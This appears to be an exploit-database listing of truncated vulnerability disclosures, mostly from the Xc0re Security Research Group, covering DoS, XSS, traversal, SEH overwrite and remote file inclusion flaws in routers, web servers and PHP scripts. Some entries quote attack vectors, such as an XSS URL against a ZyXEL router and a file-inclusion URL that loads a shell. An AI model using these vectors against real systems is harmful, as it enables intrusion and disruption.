Huawei B315s-22 - Information Leak

Product Family: LTE Model B315s – 22 Firmware version: 21.318.01.00.26 Author: Usman Saeed usman at xc0re.net 1. Unauthenticated access to sensitive files: It was observed that the web application running on the router, allows unauthenticated access to sensitive files on the web server. POC: By...

Information disclosure

The PROF. USMAN ALI AWHEELA aka com.wPROFUAAWHEELA application 2.1 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...

CVE-2014-7134

CVE-2014-7134 concerns the Android app “PROF. USMAN ALI AWHEELA” (com.wPROFUAAWHEELA), version 2.1, which does not verify SSL certificates (X.509) from servers. This allows potential attackers performing a man‑in‑the‑middle to spoof servers and obtain sensitive information via a crafted certifica...

Kolibri+ Webserver 2 - (Get Request) Denial of Service Vulnerability

No description provided by source. Name : Kolibri+ Webserver 2 , Denial Of service / Crash Author : Usman Saeed Company : Xc0re Security Reasearch Group Date : 06/09/09 Homepage : http://www.xc0re.net Download Page : http://download.cnet.com/Kolibri-WebServer/3000-102484-10896378.html?tag=mncol...

iGuard Security Access Control System Cross Site Scripting

Tile ==== iGuard Security Access Control System Webserver, Cross Site Scripting XSS Author ====== Usman Saeed , Xc0re Security Research Group Website : http://www.xc0re.net Twitter : http://twitter.com/xc0resecurity Blog : http://www.xc0re.net/blog Published :...

Polipo 1.0.4.1 - POST/PUT HTTP Header Processing Denial of Service

source: https://www.securityfocus.com/bid/49908/info Polipo is prone to a denial-of-service vulnerability. Remote attackers can exploit this issue to cause the application to crash, denying service to legitimate users. Polipo 1.0.4.1 is vulnerable; other versions may also be affected...

ZyXEL P-660R-T1 V2 Cross Site Scripting

Name : ZyXEL P-660R-T1 V2 XSS Author : Usman Saeed from Xc0re Security Research Group Homepage :http://www.xc0re.net Dated : 22/11/2010 Exploit: VECTOR :http://IP/Forms/home1?&HomeCurrentDate='alert1;'01%2F01%2F2000 This works with the post request ! As by default this value is sent through POST...

Xitami 5.0 - '/AUX' Request Remote Denial of Service

source: https://www.securityfocus.com/bid/40027/info Xitami is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. Xitami 5.0a0 is vulnerable. !/usr/bin/perl Xitami/5.0a0 Denial Of Service Disclaimer:...

Xitami / 5.0a0 Denial Of Service

Exploit for windows platform in category dos / poc ================================ Xitami / 5.0a0 Denial Of Service ================================ Name : Xitami/5.0a0 Denial Of Service Author: Usman Saeed Company: Xc0re Security Research Group Website:http://www.xc0re.net DATE: 10/05/10 Tested...

Cherokee web server 0.5.4 DoS

No description provided by source. Name : Cherokee Web Server 0.5.4 Denial Of Service Author: Usman Saeed Company: Xc0re Security Research Group Website: http://www.xc0re.net DATE: 25/10/09 Tested on Windows ! Disclaimer: This code is for Educational Purposes , I would Not be responsible for any...

Cherokee web server 0.5.4 DoS

Exploit for unknown platform in category web applications ============================= Cherokee web server 0.5.4 DoS ============================= Name : Cherokee Web Server 0.5.4 Denial Of Service Author: Usman Saeed Tested on Windows ! Disclaimer: This code is for Educational Purposes , I woul...

BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass

Name : BSR Webweaver Version 1.33 /Scripts access restriction bypass vulnerbility Author : Usman Saeed Company : Xc0re Security Reasearch Group Date : 15/09/09 Homepage : http://www.xc0re.net Download Page : http://www.brswebweaver.com/downloads.html Attack type : Remote Patch Status : Unpatched...

Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit

Exploit for unknown platform in category remote exploits =============================================================== Kolibri+ Webserver 2 GET Request Remote SEH Overwrite Exploit =============================================================== !/usr/bin/python Could not get this to work on XP...

kolibri+ Web Server 2 - Directory Traversal

kolibri+ Web Server 2 - Directory Traversal Name : Kolibri+ Webserver 2 , Directory Traversal Vulnerability Author : Usman Saeed Company : Xc0re Security Reasearch Group Date : 06/09/09 Homepage : http://www.xc0re.net Download Page :...

phpcontact-rfi.txt

/ phpContact Multiple Remote File Inclusion Vulnerabilities / //Author: Arham Muhammad //Vulnerable Files: /contactbusiness.php, /contactperson.php //Source: http://codewand.org/download/phpContact.zip //Vulnerable Code: include$includepath . "includesession.inc.php"; //Expl0it:...

Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability

^ Rad Upload Version 3.02 Remote File Include Vulnerability ^ Source: http://www.radinks.com/downloads/raduploadlite.zip ^ Vulnerable C0de On Line 39 In upload.php : ifisset$savepath && $savepath!="" ^ EXploit http://victim/directory/upload.php?savepath=sh3ll? ^ Found3d By: Arham ^ Gr33tz To --...